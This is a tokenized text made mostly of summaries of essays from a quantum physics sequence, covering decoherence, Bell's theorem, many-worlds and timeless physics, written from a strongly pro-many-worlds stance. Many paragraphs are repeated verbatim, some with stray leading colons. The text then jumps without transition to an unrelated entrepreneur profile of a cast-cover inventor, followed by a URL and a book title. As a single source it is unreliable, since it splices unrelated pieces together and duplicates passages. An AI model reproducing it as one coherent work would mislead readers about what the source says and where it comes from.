The notion of " an exact particular momentum " or " an exact particular position " is not something that can physically happen , it is a tool for analyzing amplitude distributions by taking them apart into a sum of simpler waves .
This uses the assumption and fact of linearity : the evolution of the whole wavefunction seems to always be the additive sum of the evolution of its pieces .
Using this tool , we can see that if you take apart the same distribution into a sum of positions and a sum of momenta , they cannot both be sharply concentrated at the same time .
When you " observe " a particle 's position , that is , decohere its positional distribution by making it interact with a sensor , you take its wave packet apart into two pieces ; then the two pieces evolve differently .
The Heisenberg Principle definitely does not say that knowing about the particle , or consciously seeing it , will make the universe behave differently .
: Unlike classical physics , in quantum physics it is not possible to separate out a particle 's " position " from its " momentum " .
The evolution of the amplitude distribution over time , involves things like taking the second derivative in space and multiplying by i to get the first derivative in time .
The end result of this time evolution rule is that blobs of particle - presence appear to race around in physical space .
The notion of " an exact particular momentum " or " an exact particular position " is not something that can physically happen , it is a tool for analyzing amplitude distributions by taking them apart into a sum of simpler waves .
This uses the assumption and fact of linearity : the evolution of the whole wavefunction seems to always be the additive sum of the evolution of its pieces .
Using this tool , we can see that if you take apart the same distribution into a sum of positions and a sum of momenta , they cannot both be sharply concentrated at the same time .
When you " observe " a particle 's position , that is , decohere its positional distribution by making it interact with a sensor , you take its wave packet apart into two pieces ; then the two pieces evolve differently .
The Heisenberg Principle definitely does not say that knowing about the particle , or consciously seeing it , will make the universe behave differently .
Which Basis Is More Fundamental ?:
The position basis can be computed locally in the configuration space ; the momentum basis is not local .
Why care about locality ?
Because it is a very deep principle ; reality itself seems to favor it in some way .
Where Physics Meets Experience : Meet the Ebborians , who reproduce by fission .
The Ebborian brain is like a thick sheet of paper that splits down its thickness .
They frequently experience dividing into two minds , and can talk to their other selves .
It seems that their unified theory of physics is almost finished , and can answer every question , when one Ebborian asks :
When exactly does one Ebborian become two people ?
Where Experience Confuses Physicists :
It then turns out that the entire planet of Ebbore is splitting along a fourth - dimensional thickness , duplicating all the people within it .
But why does the apparent chance of " ending up " in one of those worlds , equal the square of the fourth - dimensional thickness ?
Many mysterious answers are proposed to this question , and one non-mysterious one .
On Being Decoherent :
When a sensor measures a particle whose amplitude distribution stretches over space - perhaps seeing if the particle is to the left or right of some dividing line - then the standard laws of quantum mechanics call for the sensor + particle system to evolve into a state of ( particle left , sensor measures LEFT ) + ( particle right , sensor measures RIGHT ) .
But when we humans look at the sensor , it only seems to say " LEFT " or " RIGHT " , never a mixture like " LIGFT " .
This , of course , is because we ourselves are made of particles , and subject to the standard quantum laws that imply decoherence .
Under standard quantum laws , the final state is ( particle left , sensor measures LEFT , human sees " LEFT " ) + ( particle right , sensor measures RIGHT , human sees " RIGHT " ) .
: When a sensor measures a particle whose amplitude distribution stretches over space - perhaps seeing if the particle is to the left or right of some dividing line - then the standard laws of quantum mechanics call for the sensor + particle system to evolve into a state of ( particle left , sensor measures LEFT ) + ( particle right , sensor measures RIGHT ) .
But when we humans look at the sensor , it only seems to say " LEFT " or " RIGHT " , never a mixture like " LIGFT " .
This , of course , is because we ourselves are made of particles , and subject to the standard quantum laws that imply decoherence .
Under standard quantum laws , the final state is ( particle left , sensor measures LEFT , human sees " LEFT " ) + ( particle right , sensor measures RIGHT , human sees " RIGHT " ) .
The Conscious Sorites Paradox : Decoherence is implicit in quantum physics , not an extra law on top of it .
Asking exactly when " one world " splits into " two worlds " may be like asking when , if you keep removing grains of sand from a pile , it stops being a " heap " .
Even if you 're inside the world , there may not be a definite answer .
This puzzle does not arise only in quantum physics ; the Ebborians could face it in a classical universe , or we could build sentient flat computers that split down their thickness .
Is this really a physicist 's problem ?
Decoherece is Pointless :
There is no exact point at which decoherence suddenly happens .
All of quantum mechanics is continuous and differentiable , and decoherent processes are no exception to this .
Decoherent Essences : Decoherence is implicit within physics , not an extra law on top of it .
You can choose representations that make decoherence harder to see , just like you can choose representations that make apples harder to see , but exactly the same physical process still goes on ; the apple does n't disappear and neither does decoherence .
If you could make decoherence magically go away by choosing the right representation , we would n't need to shield quantum computers from the environment .
The Born Probabilities :
The last serious mysterious question left in quantum physics :
When a quantum world splits in two , why do we seem to have a greater probability of ending up in the larger blob , exactly proportional to the integral of the squared modulus ?
It 's an open problem , but non-mysterious answers have been proposed .
Try not to go funny in the head about it .
: The last serious mysterious question left in quantum physics :
When a quantum world splits in two , why do we seem to have a greater probability of ending up in the larger blob , exactly proportional to the integral of the squared modulus ?
It 's an open problem , but non-mysterious answers have been proposed .
Try not to go funny in the head about it .
Decoherence as Projection :
Since quantum evolution is linear and unitary , decoherence can be seen as projecting a wavefunction onto orthogonal subspaces .
This can be neatly illustrated using polarized photons and the angle of the polarized sheet that will absorb or transmit them .
: Since quantum evolution is linear and unitary , decoherence can be seen as projecting a wavefunction onto orthogonal subspaces .
This can be neatly illustrated using polarized photons and the angle of the polarized sheet that will absorb or transmit them .
Entangled Photons : Using our newly acquired understanding of photon polarizations , we see how to construct a quantum state of two photons in which , when you measure one of them , the person in the same world as you , will always find that the opposite photon has opposite quantum state .
This is not because any influence is transmitted ; it is just decoherence that takes place in a very symmetrical way , as can readily be observed in our calculations .
Many Worlds :
( At this point in the sequence , most of the mathematical background has been built up , and we are ready to evaluate interpretations of quantum mechanics . )
Bell 's Theorem : No EPR " Reality " : ( Note : This post was designed to be read as a stand - alone , if desired . )
Originally , the discoverers of quantum physics thought they had discovered an incomplete description of reality - that there was some deeper physical process they were missing , and this was why they could n't predict exactly the results of quantum experiments .
The math of Bell 's Theorem is surprisingly simple , and we walk through it .
Bell 's
Theorem rules out being able to locally predict a single , unique outcome of measurements - ruling out a way that Einstein , Podolsky , and Rosen once defined " reality " .
This shows how deep implicit philosophical assumptions can go .
If worlds can split , so that there is no single unique outcome , then Bell 's Theorem is no problem .
Bell 's
Theorem does , however , rule out the idea that quantum physics describes our partial knowledge of a deeper physical state that could locally produce single outcomes - any such description will be inconsistent .
: ( Note :
This post was designed to be read as a stand - alone , if desired . )
Originally , the discoverers of quantum physics thought they had discovered an incomplete description of reality - that there was some deeper physical process they were missing , and this was why they could n't predict exactly the results of quantum experiments .
The math of Bell 's Theorem is surprisingly simple , and we walk through it .
Bell 's
Theorem rules out being able to locally predict a single , unique outcome of measurements - ruling out a way that Einstein , Podolsky , and Rosen once defined " reality " .
This shows how deep implicit philosophical assumptions can go .
If worlds can split , so that there is no single unique outcome , then Bell 's Theorem is no problem .
Bell 's
Theorem does , however , rule out the idea that quantum physics describes our partial knowledge of a deeper physical state that could locally produce single outcomes - any such description will be inconsistent .
Spooky Action at a Distance : The No-Communication Theorem :
As Einstein argued long ago , the quantum physics of his era - that is , the single - global - world interpretation of quantum physics , in which experiments have single unique random results - violates Special Relativity ; it imposes a preferred space of simultaneity and requires a mysterious influence to be transmitted faster than light ; which mysterious influence can never be used to transmit any useful information .
Getting rid of the single global world dispels this mystery and puts everything back to normal again .
: As Einstein argued long ago , the quantum physics of his era - that is , the single - global - world interpretation of quantum physics , in which experiments have single unique random results - violates Special Relativity ; it imposes a preferred space of simultaneity and requires a mysterious influence to be transmitted faster than light ; which mysterious influence can never be used to transmit any useful information .
Getting rid of the single global world dispels this mystery and puts everything back to normal again .
Decoherence is Simple , Decoherence is Falsifiable and Testable : ( Note : Designed to be standalone readable . )
An epistle to the physicists .
To probability theorists , words like " simple " , " falsifiable " , and " testable " have exact mathematical meanings , which are there for very strong reasons .
The ( minority ? ) faction of physicists who say that many - worlds is " not falsifiable " or that it " violates Occam 's Razor " or that it is " untestable " , are committing the same kind of mathematical crime as non-physicists who invent their own theories of gravity that go as inverse-cube .
This is one of the reasons why I , a non-physicist , dared to talk about physics - because I saw ( some ! ) physicists using probability theory in a way that was simply wrong .
Not just criticizable , but outright mathematically wrong : 2 + 2 = 3 .
, : ( Note : Designed to be standalone readable . )
An epistle to the physicists .
To probability theorists , words like " simple " , " falsifiable " , and " testable " have exact mathematical meanings , which are there for very strong reasons .
The ( minority ? ) faction of physicists who say that many - worlds is " not falsifiable " or that it " violates Occam 's Razor " or that it is " untestable " , are committing the same kind of mathematical crime as non-physicists who invent their own theories of gravity that go as inverse-cube .
This is one of the reasons why I , a non-physicist , dared to talk about physics - because I saw ( some ! ) physicists using probability theory in a way that was simply wrong .
Not just criticizable , but outright mathematically wrong : 2 + 2 = 3 . Quantum Non-Realism : " Shut up and calculate " is the best approach you can take when none of your theories are very good .
But that is not the same as claiming that " Shut up ! " actually is a theory of physics .
Saying " I do n't know what these equations mean , but they seem to work " is a very different matter from saying : " These equations definitely do n't mean anything , they just work ! "
: " Shut up and calculate " is the best approach you can take when none of your theories are very good .
But that is not the same as claiming that " Shut up ! " actually is a theory of physics .
Saying " I do n't know what these equations mean , but they seem to work " is a very different matter from saying : " These equations definitely do n't mean anything , they just work ! "
Collapse Postulates :
Early physicists simply did n't think of the possibility of more than one world - it just did n't occur to them , even though it 's the straightforward result of applying the quantum laws at all levels .
So they accidentally invented a completely and strictly unnecessary part of quantum theory to ensure there was only one world - a law of physics that says that parts of the wavefunction mysteriously and spontaneously disappear when decoherence prevents us from seeing them any more .
If such a law really existed , it would be the only non-linear , non-unitary , non-differentiable , non-local , non-CPT - symmetric , acausal , faster - than - light phenomenon in all of physics .
: Early physicists simply did n't think of the possibility of more than one world - it just did n't occur to them , even though it 's the straightforward result of applying the quantum laws at all levels .
So they accidentally invented a completely and strictly unnecessary part of quantum theory to ensure there was only one world - a law of physics that says that parts of the wavefunction mysteriously and spontaneously disappear when decoherence prevents us from seeing them any more .
If such a law really existed , it would be the only non-linear , non-unitary , non-differentiable , non-local , non-CPT - symmetric , acausal , faster - than - light phenomenon in all of physics .
If Many - Worlds Had Come First :
If early physicists had never made the mistake , and thought immediately to apply the quantum laws at all levels to produce macroscopic decoherence , then " collapse postulates " would today seem like a completely crackpot theory .
In addition to their other problems , like FTL , the collapse postulate would be the only physical law that was informally specified - often in dualistic ( mentalistic ) terms - because it was the only fundamental law adopted without precise evidence to nail it down .
Here , we get a glimpse at that alternate Earth .
Many Worlds , One Best Guess :
Summarizes the arguments that nail down macroscopic decoherence , aka the " many - worlds interpretation " .
Concludes that many - worlds wins outright given the current state of evidence .
The argument should have been over fifty years ago .
New physical evidence could reopen it , but we have no particular reason to expect this .
: Summarizes the arguments that nail down macroscopic decoherence , aka the " many - worlds interpretation " .
Concludes that many - worlds wins outright given the current state of evidence .
The argument should have been over fifty years ago .
New physical evidence could reopen it , but we have no particular reason to expect this .
Living in Many Worlds :
The many worlds of quantum mechanics are not some strange , alien universe into which you have been thrust .
They are where you have always lived .
Egan 's Law : " It all adds up to normality . "
Then why care about quantum physics at all ?
Because there 's still the question of what adds up to normality , and the answer to this question turns out to be , " Quantum physics . "
If you 're thinking of building any strange philosophies around many - worlds , you probably should n't - that 's not what it 's for .
Timeless Physics :
( Now we depart from what is nailed down in standard physics , and enter into more speculative realms - particularly Julian Barbour 's Machian timeless physics . )
Mach 's Principle : Anti-Epiphenomenal Physics :
Could you tell if the whole universe were shifted an inch to the left ?
Could you tell if the whole universe was traveling left at ten miles per hour ?
Could you tell if the whole universe was accelerating left at ten miles per hour ?
Could you tell if the whole universe was rotating ?
: Could you tell if the whole universe were shifted an inch to the left ?
Could you tell if the whole universe was traveling left at ten miles per hour ?
Could you tell if the whole universe was accelerating left at ten miles per hour ?
Could you tell if the whole universe was rotating ?
Relative Configuration Space : Maybe the reason why we can't observe absolute speeds , absolute positions , absolute accelerations , or absolute rotations , is that particles do n't have absolute positions - only positions relative to each other .
That is , maybe quantum physics takes place in a relative configuration space .
Timeless Physics :
What time is it ?
How do you know ?
The question " What time is it right now ? " may make around as much sense as asking " Where is the universe ? "
Not only that , our physics equations may not need a t in them !
: What time is it ?
How do you know ?
The question " What time is it right now ? " may make around as much sense as asking " Where is the universe ? "
Not only that , our physics equations may not need a t in them !
Timeless Beauty :
To get rid of time you must reduce it to nontime .
In timeless physics , everything that exists is perfectly global or perfectly local .
The laws of physics are perfectly global ; the configuration space is perfectly local .
Every fundamentally existent ontological entity has a unique identity and a unique value .
This beauty makes ugly theories much more visibly ugly ; a collapse postulate becomes a visible scar on the perfection .
Timeless Causality : Using the modern , Bayesian formulation of causality , we can define causality without talking about time - define it purely in terms of relations .
The river of time never flows , but it has a direction .
: Using the modern , Bayesian formulation of causality , we can define causality without talking about time - define it purely in terms of relations .
The river of time never flows , but it has a direction .
Timeless Identity : How can you be the same person tomorrow as today , in the river that never flows , when not a drop of water is shared between one time and another ?
Having used physics to completely trash all naive theories of identity , we reassemble a conception of persons and experiences from what is left .
With a surprising practical application ...
: How can you be the same person tomorrow as today , in the river that never flows , when not a drop of water is shared between one time and another ?
Having used physics to completely trash all naive theories of identity , we reassemble a conception of persons and experiences from what is left .
With a surprising practical application ...
Thou Art Physics :
If the laws of physics control everything we do , then how can our choices be meaningful ?
Because you are physics .
You are n't competing with physics for control of the universe , you are within physics .
Anything you control is necessarily controlled by physics .
Timeless Control :
We throw away " time " but retain causality , and with it , the concepts " control " and " decide " .
To talk of something as having been " always determined " is mixing up a timeless and a timeful conclusion , with paradoxical results .
When you take a perspective outside time , you have to be careful not to let your old , timeful intuitions run wild in the absence of their subject matter .
Rationality and Science :
( Okay , so it was many - worlds all along and collapse theories are silly .
Did first - half - of - 20th - century physicists really screw up that badly ?
How did they go wrong ?
Why have n't modern physicists unanimously endorsed many - worlds , if the issue is that clear - cut ?
What lessons can we learn from this whole debacle ? )
http://www.showersleeve.com/
David Reynolds , a contractor by trade , had broken his arm while remodeling a bathroom in 1998 .
Keeping the cast dry proved to be very difficult , and when he tried looking around for a product to help , he was unable to find anything that was both effective and affordable .
That 's when the light bulb went on .
After doing a patent search for such a product and finding nothing , Reynolds , an inventor since childhood , designed a plastic covering with an adjustable fastening mechanism on one end to keep arm and leg casts dry .
He enlisted the help of his longtime friend and fellow contractor , Marty Ceccarelli , to build Mar - Von LLC and the brand .
But even with their innovative product in hand , it was n't easy to get it on store shelves .
" I just started going to the local drugstores , " says Reynolds .
" I had a real hard time .
Most people do n't want to give you the time of day . "
Determined to succeed , Reynolds and Ceccarelli continued to develop the Cast Cover and sales strategies for two years , and eventually landed their product on the shelves of Albertson 's / Osco Drug and 12 local Walgreens stores .
The reaction from consumers spoke volumes - their product was a fast seller .
Today , the pair sells not only Cast Covers , but also the waterproof Shower Sleeve - open on both ends , they are designed for patients with IVs .
Today , the products are sold via wholesalers and distributors and on their Web site .
Reynolds , who expects $ 2 million in annual sales by the end of the year , has this advice for other aspiring entrepreneurs : " I had a vision of inventing something , [ but ] it did n't happen overnight .
Do n't give up , and do n't take no for an answer . "
Enrepreneur Magazine
How to License Your Million Dollar Idea : Everything You Need To Know To Turn a Simple Idea into a Million Dollar Payday
